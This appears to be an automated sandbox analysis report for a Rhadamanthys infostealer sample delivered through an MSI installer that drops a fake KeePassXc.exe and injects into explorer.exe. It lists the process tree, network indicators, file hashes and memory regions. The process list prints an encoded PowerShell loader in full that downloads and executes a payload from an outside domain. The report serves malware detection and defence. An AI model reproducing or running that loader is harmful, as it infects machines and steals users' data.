memory/1988-244-0x0000000061E00000-0x0000000061EF3000-memory.dmp
memory/4028-276-0x0000018D27680000-0x0000018D2769C000-memory.dmp
memory/4028-304-0x0000018D27F30000-0x0000018D280F2000-memory.dmp
memory/4028-305-0x0000018D28100000-0x0000018D28628000-memory.dmp
memory/1988-333-0x0000000000770000-0x0000000000798000-memory.dmp
memory/1988-336-0x0000000000770000-0x0000000000798000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-01 21:53
Reported
2024-06-01 22:11
Platform
win11-20240508-en
Max time kernel
91s
Max time network
136s
Command Line
Signatures
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1080 created 2064 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\system32\sihost.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1496 set thread context of 1080 | N/A | C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe | C:\Windows\SysWOW64\explorer.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\e574100.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI42A7.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI42C9.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI5598.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e574104.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF897ACE000E9856D6.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e574100.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF4508B638EFDABC96.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI42F9.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{BFB3A06C-96C7-42C4-A90F-78C892A36FF8} | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFC3EF3208FE0EAA83.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI41DB.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI42E9.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFCE8E4D867C59CEE8.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI42B8.tmp | C:\Windows\system32\msiexec.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe | N/A |
Loads dropped DLL
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\explorer.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\dialer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C4246E35669DDEF460F00052F5831FC6
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss4346.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi4343.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr4344.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr4345.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe
"C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe"
C:\Windows\SysWOW64\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AbwBwAGUAbgBzAHUAbgAuAG0AbwBuAHMAdABlAHIALwAyADUAMAA1ADMALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAGIAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBoACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAbQAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHAAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB2ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADEANgA3ACkAIAAtAGIAeABvAHIAIAAxADgAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1496 -ip 1496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1496 -s 924
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1080 -ip 1080
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 1772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 208 -p 1080 -ip 1080
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 1780
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1080 -ip 1080
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 1776
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | not-pass.com | udp |
| US | 172.67.219.67:80 | not-pass.com | tcp |
| US | 172.67.219.67:443 | not-pass.com | tcp |
| US | 8.8.8.8:53 | 67.219.67.172.in-addr.arpa | udp |
| US | 104.21.80.7:80 | gachi-lane.com | tcp |
| US | 172.67.195.205:80 | raur94.com | tcp |
| US | 172.67.195.205:443 | raur94.com | tcp |
| US | 104.21.42.98:443 | opensun.monster | tcp |
| US | 104.21.2.229:443 | checkass.monster | tcp |
Files
C:\Windows\Installer\MSI41DB.tmp
| MD5 | b158d8d605571ea47a238df5ab43dfaa |
| SHA1 | bb91ae1f2f7142b9099e3cc285f4f5b84de568e4 |
| SHA256 | ca763693cc25d316f14a9ebad80ebf00590329550c45adb7e5205486533c2504 |
| SHA512 | 56aef59c198acf2fcd0d95ea6e32ce1c706e5098a0800feff13ddb427bfb4d538de1c415a5cb5496b09a5825155e3abb1c13c8c37dc31549604bd4d63cb70591 |
C:\Windows\Installer\MSI42F9.tmp
| MD5 | fb4665320c9da54598321c59cc5ed623 |
| SHA1 | 89e87b3cc569edd26b5805244cfacb2f9c892bc7 |
| SHA256 | 9fb3156c665211a0081b189142c1d1ab18cda601ee54d5f5d8883ecfa4177a59 |
| SHA512 | b205552a3cfbaa2202e6ef7e39e229af167b2342a7dc4a2f4cadfe4d05000966cf19e9e208e44d6bb0fd6a56f4283caeed9c13f523e5b301b87f79febb1840cf |
memory/72-28-0x0000000002A60000-0x0000000002A96000-memory.dmp
memory/72-29-0x0000000005270000-0x000000000589A000-memory.dmp
memory/72-30-0x0000000005160000-0x0000000005182000-memory.dmp
memory/72-31-0x0000000005950000-0x00000000059B6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tx4xnijq.sff.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/72-34-0x00000000059C0000-0x0000000005A26000-memory.dmp
memory/72-41-0x0000000005A30000-0x0000000005D87000-memory.dmp
memory/72-42-0x0000000005EE0000-0x0000000005EFE000-memory.dmp
memory/72-43-0x0000000005F30000-0x0000000005F7C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\pss4346.ps1
| MD5 | 30c30ef2cb47e35101d13402b5661179 |
| SHA1 | 25696b2aab86a9233f19017539e2dd83b2f75d4e |
| SHA256 | 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f |
| SHA512 | 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458 |
memory/72-45-0x0000000007660000-0x0000000007CDA000-memory.dmp
memory/72-46-0x0000000006450000-0x000000000646A000-memory.dmp
memory/72-48-0x00000000064E0000-0x0000000006502000-memory.dmp
memory/72-47-0x00000000071E0000-0x0000000007276000-memory.dmp
memory/72-49-0x0000000008290000-0x0000000008836000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\scr4344.ps1
| MD5 | c5e6cb1760799fcd20cd069562b9c480 |
| SHA1 | f7c5201de15fc2a655dd5fca39616a0c461ad6b3 |
| SHA256 | c1e94bf5215a5a3508e24f3a0ca7f2a621a993ec22bf53bfc7cfc54bbfd32301 |
| SHA512 | c6b12f914a037c509cb8533af7112be775613ec28c80ddea2e869fd2792cf89d470c22f3599c9f936625f1bc7fc291932d2caa9fe433ba355ced3fdc2d7866c6 |
memory/72-51-0x0000000007EB0000-0x0000000008072000-memory.dmp
memory/72-52-0x0000000008D70000-0x000000000929C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\msi4343.txt
| MD5 | d3cfb7d0c8d2e3fe6a0eb110baf7e755 |
| SHA1 | 369e9d8630eda9fd3d0f9bf4daa815e33207ffd4 |
| SHA256 | 5b0e557ac6fb728e4946ec8d27d97cab02d6e44dfc3a526d52643d758dbbff12 |
| SHA512 | 2b1f4b3feba76460da5bbe70cf8c2744837859e8e9df2923984f99500a6a07cf996ea441aa245708d7a6f8616148360c7dc4eae989b9584e9869f8d3bbc12ebf |
C:\Config.Msi\e574103.rbs
| MD5 | 92e495317e17655e0243555c0f74315e |
| SHA1 | 7a86c450e9216b0850b22b57c9b8b283561a0db1 |
| SHA256 | 29f0a15e076844e523dc919504b38c430d47eedfdd1c3849fac00ef7b7a3c74e |
| SHA512 | f6d7f3451270d7ee66cbaadd7c2d8cc2b10018c02b32ff9246156e430939c8428e082f08c0d79d77d2ab4920aaf96a358184e48601688d756ace0f9771cc814c |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe
| MD5 | fc16fce41560bed85c97d9551fdfc3c1 |
| SHA1 | 26a867e66cd4730383046de480aa1785d4b93bf2 |
| SHA256 | e35a84063e76646544486d2b172c7f0ffd52d28f9f258379370979b73bdc0857 |
| SHA512 | 0954901366b8d2e4bf9ff0450c072bac6cc89113f304dfae2ff87e9d3d4380780122e1ce81ce1d908a364ff1970da9e85e3a41b54b13b83d1c147611a39fde91 |
C:\Windows\Installer\e574100.msi
| MD5 | 531a806e5efce1d6ee6085e67f518029 |
| SHA1 | 45e6d6242fe8ef3986b0f2b66c72226f285bdd06 |
| SHA256 | 67ecba82950d8dfefe1b7c8564f959cdb35601dbc9a4b010bd929be7d1ae240c |
| SHA512 | 2df8901814180b2de3ffab09042c4be7f95ffb98d471f075477dead3500a046dd14e15946b3b9d72b7b8997fa745e1f866b1b518dea4b67a6ce548c0f895a4a1 |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libgcc_s_dw2-1.dll
| MD5 | a542f74ee60dfbee3e8e919acb22e773 |
| SHA1 | 8e3a47d726f3c7daf4b6168effbca676bcc0be2c |
| SHA256 | f99611c9b7000dc50f4aeac26c590072bfecffdd1cba9903b6bed649eb14550c |
| SHA512 | acfc819f23f49a296a9437a6f7aa2ce8066285312af5c72ca41973e7daa090e9ab6f30eeecb722756c2a5b3a70f959977f06c524cc11bf7c0bc99f1b3e58a7a1 |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Network.dll
| MD5 | 883d51ff2fa63084fef0b252c62b259c |
| SHA1 | 375993ca6c25195302cff56da2a7f70ed116b681 |
| SHA256 | 699225b460328cc4d6f026a57b89472db56aef46a242066c83f4c404ab9f386d |
| SHA512 | dbed13d06af7cb25c3cbe6f02be3663125a6a340e0f82e565f32d66448296af6188f98c1082d5110be567788c04f47ef402bc730ca4d5eb0fc29e3bc527a31f8 |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Gui.dll
| MD5 | b6b0178576ee844019d0f2fa214df8c8 |
| SHA1 | 6bb884f83beac17f42597160d321d4ad2bd3c6c2 |
| SHA256 | 455e4487b294c9648f2f4852ab68ba5d45e880bd1e8cf3d27e58150c2aedb20c |
| SHA512 | e214e6232d4f2469769af243b01cde10e72ef1acdad1e92fe1e9cf7b74fd127831bc223a3ad983695f35e4eadfaff49110948d63e085c551094f534e33e04ab4 |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libgpg-error-0.dll
| MD5 | c72948b84d9dd02eb85f1774739eafa8 |
| SHA1 | 1f255f8b808ee310dba95beb896a3ec360f16ebc |
| SHA256 | 2b1df97fb3cf4a54d68bf7ca2611f0cc0663908309fd58a48989804dc4fec284 |
| SHA512 | fda087b6e86cf02dcf4324e391be2f8ef54dce9cb787dbc343d90efd9d9f54189fe0994fee628c0465c1c9f51c6d1783955c8002215517fc5358ae1e7518067b |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libicuin68.dll
| MD5 | fd240f08139a7bbefc3aeec099210579 |
| SHA1 | f2738c0a2b3ef6a51d7b89d731854a0924f71bfb |
| SHA256 | e8e72f078844e6fc97fa9ed417eefef7fc30192b3f6f0074d6d6d80a176d3100 |
| SHA512 | 14177b251e771c88148c9a2ff433f64c1a9c977320c42c882381e698fff7592148b6d7485c537bc720ac3685bb3cbef6cea63e50fe038c8f6a5b61e9460d16f4 |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libyubikey-0.dll
| MD5 | efd34359fa6e0cb9f3765d4831f862c8 |
| SHA1 | 961d36e8941c66364744fbbe6bf0131367b4d57b |
| SHA256 | f23649804997c19423dfa6899309a27c3f42202339b0ae4cb20de430f81982e9 |
| SHA512 | 0ec82cc0f24656ce7e51cce8cce465572d31566dd562e2397641bbc72142062f1fa58f5892dfd9adbf7ab1e554f405911d757e9091a85d95fd2d3edd3a00f0e0 |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libzstd.dll
| MD5 | 411642ebdf422cac211237a449ffb139 |
| SHA1 | cfb06e94ccdc6704d8ea3f5659481c317a0371af |
| SHA256 | 23272d4c3f19a13fa236369d2a296202a3c7067fa1698572dea9c23b9eae00b7 |
| SHA512 | 4a144c877ec977ba6db0166ba3a559b9201bdc66c0bcf11b4772565c713a5f6f207168490b3a8231e6d23dd6041ce01df66e3af7d6b4899a743e6c3bfe598670 |
memory/1496-182-0x00000000721F0000-0x00000000723EA000-memory.dmp
memory/1496-185-0x0000000000F40000-0x0000000000F65000-memory.dmp
memory/1080-187-0x0000000000110000-0x0000000000138000-memory.dmp
memory/1496-189-0x0000000062D80000-0x0000000062DBB000-memory.dmp
memory/1496-190-0x0000000000710000-0x0000000000CDF000-memory.dmp
memory/1496-188-0x0000000072BA0000-0x00000000732FD000-memory.dmp
memory/1080-186-0x0000000000110000-0x0000000000138000-memory.dmp
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libjson-c-2.dll
| MD5 | 945bb6d5d03ed15f25aa2f79efcdff20 |
| SHA1 | 1e1ecae2cd6c78df6feeda4b921f649d5c76f01f |
| SHA256 | 21f5a93fb4d8c3538468d08a706c0063a88aaeaa8a926d780b0a84a10c83f6f5 |
| SHA512 | 2f36903b08165de3d4e9286de93400f532a7a0077e061bed02a8f8dea42f78cd2407c1d45dfa1a0bea5b9d0215167ad62a5eb5cacd9e3aa45e57b89b56722f86 |
C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libpcre2-16-0.dll
| MD5 | bb8004dd00979ea17a243df6d40f2b05 |
| SHA1 | 482b4ea7b92e3aee7b13278ee79ce84ee7e09d7a |
